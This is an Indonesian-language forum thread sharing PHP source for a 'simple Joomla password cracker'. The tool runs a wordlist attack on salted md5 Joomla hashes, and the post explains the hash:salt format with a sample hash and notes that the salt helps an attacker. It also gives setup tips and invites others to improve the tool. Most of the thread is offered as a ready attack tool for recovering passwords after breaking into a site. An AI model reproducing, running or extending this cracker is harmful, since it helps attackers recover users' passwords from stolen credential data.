simple joomla password cracker [source]

heart_attack

ini sekedar share source nya saja... seprti yang aku katakan..hal kecil yang jarang kita perhatikan.. :P :P :P
kan jika kita masuk ke panel joomlanya banyak kita temukan code unik... banyak yang buntu disana.. :D saat pengambilan password nya..

<HTML>
<HEAD>
<BASEFONT SIZE=3>
<TITLE>::: Joomla Password Cracker :::</TITLE>

</HEAD>

<BODY BGCOLOR=#000000 vlink=#0000FF>

<center>
 
 

 
 
<TABLE BORDER=0 WIDTH=500 CELLPADDING=3 CELLSPACING=0>
<tr><td> Simple
Joomla Password Cracker 
Developed by : siganteng.com 
</td>
</tr>
</table>
<!– Demonstration –>
<BODY>
<center>
<form action=index.php method=”POST”>


Masukkan password hashnya disini : 
 
<input type=”text” name=”hash” size=55 style=”font-family: Verdana; font-size: 8pt; color: #00FF00; border: 1px solid #00FF00; background-color: #000000″>
<input type=”submit” name=”send” value=”Cari !!!” style=”font-family: Verdana; font-size: 8pt; color: #00FF00; border: 1px solid #00FF00; background-color: #000000″>

 

</form>

<?php
$hashes=array();
$i=0;
$parts=explode(”:”,$_POST['hash']);
$hashes[$i][0]=$parts[0];
$hashes[$i][1]=$parts[1];

if (ISSET($_POST['hash']))
{
$str = ” “;
echo “Started: ”;
echo date(”F j, Y, g:i:s a”);

$lines = file(’kamus2.txt’);

foreach ($lines as $line_num => $line)
{
check($line);
}

$lines = file(’kamus1.txt’);

foreach ($lines as $line_num => $line)
{
check($line);
}

echo “ Finished : ”;
echo date(”F j, Y, g:i:s a”);

}

function check($a)
{
global $i;
$a=rtrim($a) ;

for($x=0;$x<=$i;$x++)
{
global $hashes;

if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo “ The password is : <h1>$a</h1>”;
echo “Ended: ”;
echo date(”F j, Y, g:i:s a”);
}

}

}
?>
 Tolong di kembangkan ya ?! 
</center>
</body></html>

———————–// cut here
==================================================================================

Untuk menjalankan script ini di localhost anda perlu merubah konfigurasi php.ini, yaitu dengan mengganti baris ini :
memory_limit = 32M ;

menjadi > 32, diganti menjadi :
memory_limit = 256M ;

enkripsi password joomla biasanya terdiri dari hash dan salt. Standar enkripsi joomla biasanya berbentuk seperti ini :

b51498faae03f7cf533e3ed97fc00116:9VrQpQzdNQHhtieK <<---- gini yah? xixixiix :P :P :P

Hashnya itu terdapat pada bagian yang pertama yaitu b51498faae03f7cf533e3ed97fc00116, dan saltnya itu ada di bagian akhir 9VrQpQzdNQHhtieK, keduanya terlihat di pisahkan dengan titik dua “:”. Salt bagi seorang attacker berfungsi untuk membantu dalam pencarian password sesungguhnya.
Yang ditemukan disini adalah jika password berbentuk plain text di gabung dengan saltnya maka akan menghasilkan hash password joomla. Dengan kata lain jika : x + salt = hash joomla. Sehingga jika di implementasikan melalui enkripsi md5 :

md5(x + salt) = hash

maka :

md5(x + 9VrQpQzdNQHhtieK) = b51498faae03f7cf533e3ed97fc00116

Ya seperti pada baris kalimat ini :

…
if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo “ The password is : <h1>$a</h1>”;

-yang simple biasa luput dari pandangan kita-

klo ada kekurangan mohon ditambahin... eheheheh.... bantuin gua dunkz... :P :P :P

BenyCooL

sieeep...

arsen

:o:o wah...abot..abot..nang otek B)